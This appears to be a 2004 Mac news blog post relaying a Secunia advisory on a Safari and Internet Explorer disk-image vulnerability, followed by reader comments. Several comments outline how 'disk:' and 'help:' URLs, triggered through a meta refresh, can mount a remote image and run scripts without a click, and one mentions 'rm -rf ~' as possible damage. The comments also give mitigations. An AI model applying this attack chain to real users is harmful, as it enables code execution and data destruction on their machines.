Mac OS X Safari, Internet Explorer users urged to change preferences to protect against security iss

“In what is being described as a ‘highly critical’ vulnerability, security firm Secunia on Monday issued an advisory to all Mac OS X users that surf the Web with Microsoft’s Internet Explorer or Apple’s Safari Web browsers,” Jim Dalrymple reports for Digit Magazine. “The result of the vulnerability, which has been confirmed using Safari 1.2.1 (v125.1) and Internet Explorer 5.2, is that it is ‘possible to place arbitrary files in a known location, including script files, on a user’s system if the Safari browser has been configured to (‘Open ‘safe’ files after download’) (default behavior) by asking a user to download a ‘.dmg’ (disk image) file.'”

Secunia recommends opening Safari preferences and uncheck “Open ‘safe’ files after download.”

Full article here.


  1. Actually the specifics is that it uses a “help:” URL to run a script to open an arbitrary file. In actual fact “help:” can run ANY applescript if the path is known. If used with a “disk:” URL a remote disk image can be mounted and then anything on that image can be run.

    You can stop help viewer process the “help:” URL which will prevent the exploit by using an applicaton such as MisFox ( ) to change the protocol helper to something like preview, but this will break some features of the help viewer. However a lack of help is certainly better then rm -rf ~

  2. So, when is it the user’s responsibility to know what they are downloading? It’s not like a .dmg file can actually download itself, even if Safari opens it after. So far, all these OS X “security issues” are based on the user actively choosing to DL unkown/untrusted files, and giving their admin password to install unknown/untrusted software. Somewhere along the way, the user is responsible for their actions, and everybody should be aware that malicious software is trying to get in, and it is up to you to know better. You wouldn’t drive through Harlem at midnight and pick up a hitchhiker, would you?

    As far as Windows goes, that’s like driving a convertible through Harlem at midnight. Locked doors just don’t help.

  3. Atomic- I know Mac users are generally more informed but for the most part people don’t mess with these things. That’s why Mac is a better choice in the first place- ’cause you don’t have to fiddle with things like these- much. It may be sad, but it’s true. I don’t like to mess with these things even though I do so I’m safer.

  4. The Crunge – You’re wrong this time. It coud just look like a link. People follow links all the time without knowing what’s on the end of the. It could say ‘click for more information’.

    And A-Bomb – You sound astonishingly arrogant to me today. I honestly don’t know if I have that checked or not (I’ll be looking when I get home). The point is that you shouldn’t need to care about this stuff. It should be configured correctly out of the box. It’d be better if Apple not only unchecked the box by default, but actually removed it too. If it’s so potentially dangerous, it shouldn’t exist at all.

  5. Better SAFE then sorry…


    I usually hate to write with capitals but too many people are downplaying this one. If the diskimage is loaded through the disk:// protocol it will ignore the setting in Safari and the dangerous script still gets to be executed. To make sure you don’t get bitten change the helper for the help:// protocol!

  6. The Crunge: You don’t even have to click on a link… The link using “disk:” could be located in a meta refresh tag that could appear to just be flashing to the web surfer…

    And then, all one has to do is another one using help: and you’re done…

    No click from the user, even with the “Open safe files” set to off…

    That IS a vulnerability!

  7. Does the download location get passed back to a web server?

    Wouldn’t changing your default download location to a randomly named folder on the desktop be just as effective?

  8. I just unchecked this in the General section of Preferences, and can confirm this is a new computer wherein I had not checked this in the first place, so I can definitely confirm this is checked automatically when Safari is loaded by Apple before the computer is sold.

Reader Feedback

This site uses Akismet to reduce spam. Learn how your comment data is processed.